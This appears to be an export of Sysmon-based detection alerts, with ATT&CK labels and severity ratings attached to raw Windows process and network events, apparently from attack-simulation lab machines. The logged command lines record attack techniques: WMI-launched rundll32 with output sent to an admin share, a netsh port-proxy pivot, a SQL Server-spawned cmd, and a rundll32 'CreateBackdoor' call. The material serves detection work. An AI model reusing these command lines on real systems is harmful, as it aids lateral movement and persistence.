<Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.777453Z"">
</TimeCreated>
<EventRecordID>421227</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.776</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-001088C23300</Data>
<Data Name=""ProcessId"">2784</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c set &gt; c:\users\\public\netstat.txt ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-11-03T13:51:58.263043Z"">
</TimeCreated>
<EventRecordID>56509</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3180"" ThreadID=""4224"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-11-03 13:51:56.380</Data>
<Data Name=""ProcessGuid"">747F3D96-DB7C-5DBE-0000-0010CF6B9502</Data>
<Data Name=""ProcessId"">5004</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c set &gt; c:\users\\public\netstat.txt</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\sqlsvc</Data>
<Data Name=""LogonGuid"">747F3D96-CE3B-5DBE-0000-00201ED50100</Data>
<Data Name=""LogonId"">0x1d51e</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-CE42-5DBE-0000-0010EE430200</Data>
<Data Name=""ParentProcessId"">3936</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe</Data>
<Data Name=""ParentCommandLine"">&quot;c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe&quot; -sSQLEXPRESS</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated a network connection from hostname ( MSEDGEWIN10 ) and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-12-15T15:00:15.695478Z"">
</TimeCreated>
<EventRecordID>589975</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3524"" ThreadID=""4288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-12-15 15:00:14.470</Data>
<Data Name=""ProcessGuid"">747F3D96-CF4B-5FD8-0000-00101AD58700</Data>
<Data Name=""ProcessId"">6976</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10</Data>
<Data Name=""SourcePort"">50008</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">10.0.2.17</Data>
<Data Name=""DestinationHostname"">MSEDGEWIN10CLONE</Data>
<Data Name=""DestinationPort"">49666</Data>
<Data Name=""DestinationPortName""></Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:58.543692Z"">
</TimeCreated>
<EventRecordID>4948</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:58.355</Data>
<Data Name=""ProcessGuid"">747F3D96-6646-5D3F-0000-001029398B00</Data>
<Data Name=""ProcessId"">6760</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
</TimeCreated>
<EventRecordID>17589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
<Data Name=""LogonId"">0x1070ce</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
</TimeCreated>
<EventRecordID>17589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
<Data Name=""LogonId"">0x1070ce</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-14T01:29:04.306885Z"">
</TimeCreated>
<EventRecordID>17589</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2000"" ThreadID=""1960"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-14 01:29:04.293</Data>
<Data Name=""ProcessGuid"">365ABB72-19E0-5CDA-0000-001006711000</Data>
<Data Name=""ProcessId"">1932</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\System32\mshta.exe -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-19E0-5CDA-0000-0020CE701000</Data>
<Data Name=""LogonId"">0x1070ce</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
<Data Name=""ParentProcessGuid"">365ABB72-965E-5CDA-0000-0010AF760000</Data>
<Data Name=""ParentProcessId"">596</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k DcomLaunch</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:32:55.368823Z"">
</TimeCreated>
<EventRecordID>578497</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:32:55.351</Data>
<Data Name=""ProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
<Data Name=""ProcessId"">7280</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-0433-607F-0000-002073600700</Data>
<Data Name=""LogonId"">0x76073</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
<Data Name=""ParentProcessId"">2532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.443845Z"">
</TimeCreated>
<EventRecordID>243556</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.441</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-00102F962000</Data>
<Data Name=""ProcessId"">6136</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1086] PowerShell Process found,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2021-04-20T20:32:55.368823Z"">
</TimeCreated>
<EventRecordID>578497</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3392"" ThreadID=""4112"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2021-04-20 20:32:55.351</Data>
<Data Name=""ProcessGuid"">747F3D96-3A77-607F-0000-00105DD17600</Data>
<Data Name=""ProcessId"">7280</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows PowerShell</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">PowerShell.EXE</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -Version 5.1 -s -NoLogo -NoProfile</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-0433-607F-0000-002073600700</Data>
<Data Name=""LogonId"">0x76073</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-04C3-607F-0000-0010F13B1E00</Data>
<Data Name=""ParentProcessId"">2532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
